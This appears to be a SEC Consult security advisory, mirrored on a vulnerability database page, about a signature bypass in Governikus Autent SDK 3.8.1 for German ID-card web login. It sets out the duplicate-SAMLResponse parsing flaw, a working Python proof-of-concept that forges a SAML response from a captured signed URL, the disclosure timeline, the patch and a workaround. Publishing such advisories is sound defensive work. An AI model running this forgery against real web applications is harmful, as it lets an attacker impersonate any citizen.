Lucene search
K

Governikus Autent SDK 3.8.1 Signature Bypass

🗓️ 21 Nov 2018 00:00:00Reported by Wolfgang EttlingerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 259 Views

Governikus Autent SDK 3.8.1 Signature Bypass. Critical vulnerability in German id card authentication

Code
`An additional blog post has been published on this topic as well:  
  
English version: https://r.sec-consult.com/governikus  
  
German version: https://r.sec-consult.com/gov  
  
  
SEC Consult Vulnerability Lab Security Advisory < 20181121-0 >  
=======================================================================  
title: Signature Bypass / Authentication Bypass  
product: Governikus Autent SDK  
vulnerable version: <=3.8.1  
fixed version: 3.8.1.2  
CVE number: -  
impact: critical  
homepage: https://www.governikus.de/  
found: 2018-06  
by: W. Ettlinger (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Europe | Asia | North America  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
German original, translated to English: "In the course of digitization, electronic  
identities have become indispensable. At the same time, the requirements for  
protection, handling with regard to legal security and the federation of  
electronic identities are increasing. With Governikus Autent, server and client  
components are available to ensure authentication through electronic identities.  
Governikus Autent meets all the requirements of a modern identity management  
solution.a  
  
Source:  
https://www.governikus.de/produkte-loesungen/governikus-autent-und-ausweisapp2/  
  
  
Business recommendation:  
------------------------  
During a short crash test SEC Consult identified a critical vulnerability in the  
Governikus Autent SDK nPA authentication code (German id card authentication).  
  
This vulnerability could allow an attacker to impersonate any German citizen  
on a vulnerable web application.  
  
SEC Consult recommends to immediately apply the workaround described below or  
apply the patch provided by the vendor. Moreover, SEC Consult recommends web  
application providers to check historic log files for evidence of this attack.  
SEC Consult recommends conducting a thorough source code security review on  
the Governikus Autent components as they are integral for the security of many  
web applications.  
  
  
Vulnerability overview/description:  
-----------------------------------  
The software component tested is used by web applications to integrate nPA  
authentication (authentication using the German official id document).  
  
As the last step of an authentication transaction, the web application the user  
authenticates against receives a string containing all relevant data about the  
citizen (e.g. first name, last name). As this string is signed by a trusted  
party (an eID server), the application can verify the authenticity of this  
string.  
  
The component in the web application that is supposed to verify this signature  
can be tricked into accepting a string that has been modified. An attacker that  
has acquired a single legitimately signed string can use this to authenticate  
as any German citizen to any web application that trusts the eID server's  
signature. An attacker could acquire such a signed string by hosting a web  
application and tricking a victim to authenticate, by gaining access to a  
signed string sent to a legitimate web application (man-in-the-middle attack,  
getting access to the access log) or by authenticating against a web application  
using his own id document.  
  
  
Proof of concept:  
-----------------  
1. Signature Bypass  
  
During the last step of the NPA transaction, the user is redirected to the  
SAML receiver of the web application she tried to authenticate against. The SAML  
response is sent as a URL parameter:  
  
https://<host>/<receiver path>?SAMLResponse=<SAML  
response>&RelayState=<...>&SigAlg=<sig alg.>&Signature=<signature>  
  
According to the demo application, the first verification a SAML receiver is  
meant to do is call the method HttpRedirectUtils.checkQueryString passing the  
query string (as it is returned by request.getQueryString()). If this method  
returns false, the signature could not be verified.  
  
This method internally deconstructs the query string into individual parameters,  
reconstructs the query string and then verifies the signature.  
  
If however, the query string contains multiple parameters of the same name, only  
the last occurrence of a parameter is built into the query string the signature  
is verified against. Therefore, if a query string is constructed like following,  
the first SAML response is ignored during signature verification:  
  
...?SAMLResponse=<SAML response 1>&SAMLResponse=<SAML response 2>...  
  
Afterwards, when the SAML response is processed, the application is likely to  
use the method ServletRequest.getParameter() to retrieve the SAML response (the  
demo application which is meant to show the integration of the library also  
does this). As per the specification of this method, the application server is  
supposed to return the first parameter value, if multiple parameters with the  
same name were sent.  
  
Thus, the signature is verified against the second occurrence of the  
SAMLResponse parameter, while the first occurrence of the SAMLResponse parameter  
is further processed by the application.  
  
An attacker is therefore able to arbitrarily modify an authentic query string.  
By obtaining such a string (e.g. by providing a web application with nPA  
login and then checking the access log), he is able to authenticate as any  
citizen against any vulnerable web application that also trusts the issuer of  
the signature.  
  
The following script demonstrates this issue:  
----- snip -----  
import webbrowser, re, urllib, zlib  
from urlparse import urlparse  
from base64 import b64encode  
  
# enter the URL of the receiver  
AUDIENCE = 'https://localhost:8443/AutentSAMLDemo/NewReceiverServlet'  
  
saml = '''<?xml version="1.0" encoding="UTF-8"?>  
<samlp:Response  
xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"  
xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xs="http://www.w3.org/2001/XMLSchema"  
xmlns:eid="http ://bsi.bund.de/eID/"  
Version="2.0">  
<samlp:Status>  
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" />  
</samlp:Status>  
<saml2:Assertion Version="2.0">  
<saml2:Conditions>  
<saml2:AUDIENCERestriction>  
<saml2:AUDIENCE>##AUDIENCE##</saml2:AUDIENCE>  
</saml2:AUDIENCERestriction>  
</saml2:Conditions>  
<saml2:Subject>  
<saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">  
<saml2:SubjectConfirmationData NotOnOrAfter="2099-01-01T00:00:00.000Z"  
Recipient="##AUDIENCE##" />  
</saml2:SubjectConfirmation>  
</saml2:Subject>  
<saml2:AttributeStatement>  
<saml2:Attribute Name="AcademicTitle">  
<saml2:AttributeValue xsi:type="xs:string">The Bad</saml2:AttributeValue>  
</saml2:Attribute>  
<saml2:Attribute Name="GivenNames">  
<saml2:AttributeValue xsi:type="xs:string">Evil</saml2:AttributeValue>  
</saml2:Attribute>  
<saml2:Attribute Name="FamilyNames">  
<saml2:AttributeValue xsi:type="xs:string">Attacker</saml2:AttributeValue>  
</saml2:Attribute>  
<saml2:Attribute Name="DocumentValidity">  
<saml2:AttributeValue xsi:type="eid:DocumentValidityResultType" Version="1">  
<eid:ReferenceDate>2010-01-01</eid:ReferenceDate>  
<eid:Status>valid</eid:Status>  
</saml2:AttributeValue>  
</saml2:Attribute>  
<saml2:Attribute Name="DocumentType">  
<saml2:AttributeValue xsi:type="xs:string">ID</saml2:AttributeValue>  
</saml2:Attribute>  
</saml2:AttributeStatement>  
</saml2:Assertion>  
</samlp:Response>'''  
  
saml = saml.replace('##AUDIENCE##', AUDIENCE)  
  
# make SAML as small as possible to fit it in a GET request  
saml = re.sub('\s+', ' ', saml)  
  
# read the captured signed URL  
with open('signed_url.txt', 'rt') as f:  
url = urlparse(f.read().strip())  
  
c = zlib.compressobj(-1, zlib.DEFLATED, -9)  
compressed = c.compress(saml) + c.flush()  
  
url = url._replace(query='SAMLResponse={0}&{1}'.format(  
urllib.quote(b64encode(compressed)),  
url.query))  
  
webbrowser.open(url.geturl())  
----- snip -----  
  
  
Vulnerable / tested versions:  
-----------------------------  
The version that was distributed with the demo application (3.8.1) was found  
to be vulnerable which was the latest version available at the time of  
discovery.  
  
Moreover, the library version distributed/included with the (at the time of  
discovery) latest release of the beA Client Security (3.20.3) is vulnerable  
as well. As our identified vulnerability affects HTTP query parsing, the  
beA client is most likely not vulnerable. No further analysis has been  
performed though.  
  
  
Vendor contact timeline:  
------------------------  
2018-07-05: Contacting CERT-Bund for coordination support with vendor and  
German government agencies  
2018-07-05: CERT-Bund: information will be forwarded to affected parties  
2018-07-12: CERT-Bund: advisory has been forwarded to Governikus, is being  
investigated  
2018-08-03: Requesting status update  
2018-08-03: CERT-Bund: Governikus has been contacted again  
2018-08-10: CERT-Bund: Governikus will be able to provide a patch until  
2018-08-24  
2018-08-10: Internally coordinating release date, asking for details about the  
patch  
2018-08-10: CERT-Bund: vulnerability has been patched, customers will be  
informed by Governikus  
2018-08-21: CERT-Bund provides additional details about the patch  
2018-08-22: SEC Consult informs CERT-Bund that the advisory will be released at  
a later date  
2018-09-28: Informing CERT-Bund about release date: 2018-11-21  
2018-11-12: Sending blog post draft to CERT-Bund/Governikus  
2018-11-21: Public release of the advisory.  
  
  
Solution:  
---------  
Upgrade to version 3.8.1.2 of the Governikus Autent SDK.  
  
  
Workaround:  
-----------  
In order to mitigate this issue, a web application could check if the request  
parameters provided to the receiver servlet contain multiple parameters of the  
same name. If this is the case, the authentication process has to be aborted.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF W. Ettlinger / @2018  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation